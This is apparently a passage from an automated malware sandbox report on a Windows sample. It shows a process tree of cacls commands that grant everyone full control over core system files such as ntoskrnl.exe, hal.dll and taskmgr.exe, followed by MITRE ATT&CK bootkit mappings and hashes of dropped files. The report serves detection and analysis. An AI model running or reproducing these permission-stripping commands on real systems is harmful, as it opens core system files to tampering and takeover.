        cacls "C:\Windows\system32\taskmgr.exe" /grant "everyone":F
        5⤵
        
        PID:3892
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:2752
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\hal.dll" /grant "everyone":F
        5⤵
        
        PID:3212
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:1764
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\ntoskrnl.exe" /grant "everyone":F
        5⤵
        
        PID:4364
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:2776
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\perfmon.exe" /grant "everyone":F
        5⤵
        
        PID:4628
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:4832
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\logonui.exe" /grant "everyone":F
        5⤵
        
        PID:1800
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:3032
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\resmon.exe" /grant "everyone":F
        5⤵
        
        PID:1560
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:4420
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\taskkill.exe" /grant "everyone":F
        5⤵
        
        PID:2176
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:4400
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\tasklist.exe" /grant "everyone":F
        5⤵
        
        PID:1300
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:3608
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\system32\tskill.exe" /grant "everyone":F
        5⤵
        
        PID:2272
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:4092
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Program Files\Process Hacker 2" /grant "everyone":F
        5⤵
        
        PID:3460
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo y"
        5⤵
        
        PID:4300
    - - C:\Windows\system32\cacls.exe
        
        cacls "C:\Windows\System32\drivers" /grant "everyone":F
        5⤵
        
        PID:2224

C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\106.0.5249.119\elevation_service.exe"
1⤵
PID:3192

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Pre-OS Boot

T1542

Bootkit

T1542.003

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Pre-OS Boot

T1542

Bootkit

T1542.003

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
2KB

MD5
540628cd868694b35e78a2fcf3c64106

SHA1
6dc3aae3f14f9fd333dadc0bac58b0751d3cf939

SHA256
1f6ceaf20791c6c4522c1f95cc79df61b7b64feaf96d819176611bc3ad9c8386

SHA512
e047ba3efc8b5c5962f8b113641207ea8de4b8e0ca09db0e7f1941fbd99169c7cc6e32eef0433552b6334c19568bdb7666e530d4cb44a425ad2757969b702a37

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index

Filesize
1KB

MD5
3317a33cfc29c6ccd4b3d4e94e887b83

SHA1
8bcc561db8233af2e53aa0548bd532c37582b3e8

SHA256
818db7a461050a56d683cd331832cb3d7ea6a8260daaf175b7ee3934b5bf89ad

SHA512
d57b8e47c5a38a8585a82bc1114de35cf255c33d9c87b72f5eb065f4afc3ca40ca27c558890cc3d84ddaadd756c66ca7f820867a95358d12aaf1ede869002576

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
015a2f88c69d91d7e87ee412f7def503

SHA1
d7a84f1a0a4c97d0d67a55b82572ed256053dffb

SHA256
c6fa726a4a259b764f77ba44940ed5ee3c244c3b3909a9638dff848420ca31e6

SHA512
65c019ea42873787e0a646ec6b3378f3f532266471208525caa120c6cf414fc6841c1ca11ec5939141a1f9b6d91ff9cc5370d3dcfe398519add9fd602ff0313d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
323b17a21bfad9d01e2c03e58b513b0d

SHA1
7ca1b21a9591a011f048aa4e6092a61e5e70c1e7

SHA256
0dceda91d69e537d9a956e8774e1d427e680ee2b977725740a38dd484bbc539a

SHA512
91f2428baea9fa428fb09f04697a8332866570a96f5043bb39ece723a3650ff11b280194b9ee9f56db076336fdf5adc066ec802dbd95be7981a99bc7831aef30

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
4bb8e80ea32fe402db660aadca80bc32

SHA1
4d24b3f399d60cc47e1a9bb0ef148617ae2112ee

SHA256
34aa7b0a90077bff594711813f76ca10566d3c150019b246da43e2f6f245e155

SHA512
d96240298969f5fbf9fdac06b851f5e3465427e1bb25f1a83c434f572f2bca6a097820f6ce27dc009b2919cb94f7f1525f810325d45df31709f2762925c580b3

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
7e9669d4b64d08125fee6f323e12d8d0

SHA1
0426d4ebc4d5b0664e3de4753abb070ec7f5fa8a

SHA256
fa6d98ca7c3a3f89e921b23d4493210fe6755a1f8db913fe1109cc6b2e33cb80

SHA512
8ac0090e79f769f3ae5c65a42a882e4e59458e42dea9eea09b47e237599177eb6ff8863d47ee1d7102784661537636f79d90b25834a9d62d49b3668a84116634

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity

Filesize
1KB

MD5
ef199f83a2490dfd03ac845750e8aa29

SHA1
59ef459ed8c94e1da5662ae692876ef3026739b9

SHA256
22b1702f808d989aeb889c39dedb3431d7da8fcc057aafd6d6699a5645010f5d

SHA512
9b6c6f625744cd9565f582c465c63bef45674a6bb66b502c9eb60b2a06ca0e9538a644800249bbf218511ce4284e4ba64a63091d299873b7c58a9f999155c72c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
85cf1f3b6f9d4428301cb7f0802b3adf

SHA1
4ca5d619e7932463567a17864e29ac3788fe85dc

SHA256
5e9db9e4a9c4eb22a63a6021c890ae843f85dc0e54e5300e33f63564aaa60e03

SHA512
152f7f07c2a434aff729cee58a7c135a8d9b6c7a4a4334d51d5aa738617b87833ae0b79b87cefd8d4c6ab428d3cac00d46cf9c4d9c029acd8f07205b85cda074

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
dd0b1bb28a2fadfbf252340f51b50087

SHA1
9c46f0b0947e600470baca4d07e59876d102055f

SHA256
0be3fd6c96c128a71c1275329f47e44fed338bcb0627f063f4fca1cdab8add21

SHA512
f90ccf70461cab01c0e0547bdae8eeb43051f87f7e7850a5c7dcf94b36ae0be295b18cd45c82c23acef23803232711180e062f61c009658685f4b78dfe31a466

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
6KB

MD5
4d548231eb768ecd9131f64d09a5f484

SHA1
0cefa9b3b714d9a69d8d823e4055b6910c504380

SHA256
6099be65f020332b34a45b52f34ad086db20d6f95ec690db93d4b5c5c68f6ee3

SHA512
b6ef58d2d4375e0df55b49165cc19fec267deec221058b8b8c9485957a65380e2558f9e49e54fb4d3cf2ca59c9443ae9e09e67d330455cca121551c1b2d424f7

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
136KB

MD5
626b64b810b25479669c363bae353195

SHA1
cd2bd5040118a9018218449d7f60e115623fab81

SHA256
234e3c52da389cfb14a0b3cdf45811f691e8d74f39d38645b043c8e4f11141be

SHA512
d7f5f02533cc271bfdfd89a6cdbb469a38ece09c66c6ae279d610eac04d064f2a94d9a4e0925804875417ba906ccbbdf23af806288a50f982175a64eb465ef12

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\persisted_first_party_sets.json

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Temp\2B40.tmp\2B41.tmp\2B42.bat

Filesize
5KB

MD5
a645734f3bf4a2682cbaf546789ec0c4

SHA1
fafcc11909412bf51f217e12dfaa93a15181a3e2

SHA256
3b9b5b1659a881d15962541fb56638379a6e5b5d02435f8c50574ec003bc64b0

SHA512
efa399503b982eda2058a70b10289275fe3c51280bdbb649be40cc3f17c6085267236dc0f6f8bbbf782105e6f5510e6dbbd97de8e87113abc1d8c340ccad9a6d

Download Submit
C:\Users\Admin\AppData\Roaming\DetectKey.exe

Filesize
87KB

MD5
aba9a3cf4e1db4602c25405987b809a6

SHA1
6cd545ea023ce9cdfe76607c6801cc11ff7d9e80

SHA256
490df924cadff4806ad1c1a261c71f7e06320826eda532394462e7ee32c570d6

SHA512
e5a9e28549bab93f5cf2464707b3b46859271dea16f69e8757b00f79989b2665d3b9bc3d9794d1d9e1111f8ee03ecb933f1fadfcd2adeb695dc0fce0b8f90675

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 52799.crdownload

Filesize
247KB

MD5
733eb0ab951ae42a8d8cca413201e428

SHA1
640ffb3ee44eb86afaea92e6c5aa158a5d4aafd1

SHA256
52d6d769eb474d4138ac31e05634a6ca7a4ebef5920f8356c1cd70d9fa42c2fb

SHA512
c7cdf77aa881c5dbb2abf17913dbf645fe88e16fa11fa055392d36ccf936fc43050c48feb631e193fe044123a190f123d2d6ff12234c0ff7c8c7c6e290209d8f

Download Submit
C:\Windows\Temp\winconfig.exe

Filesize
139KB

MD5
11d457ee914f72a436fa4a8a8f8446dd

SHA1
d0308ca82ed9716b667e8e77e9ae013b9af44116

SHA256
c55e98b21e7e8639d4a6702de75bccc47b337bc639ea33231a507946f74964ef

SHA512
4c861cb0fa7170d6c71e11b3a826d1802ff0f9d029cfefa7428655929d5bab4bf56abeeb963e4927def3e959f2d4a0f199c8c3bf3ecbef8885189a52eeef666b

Download Submit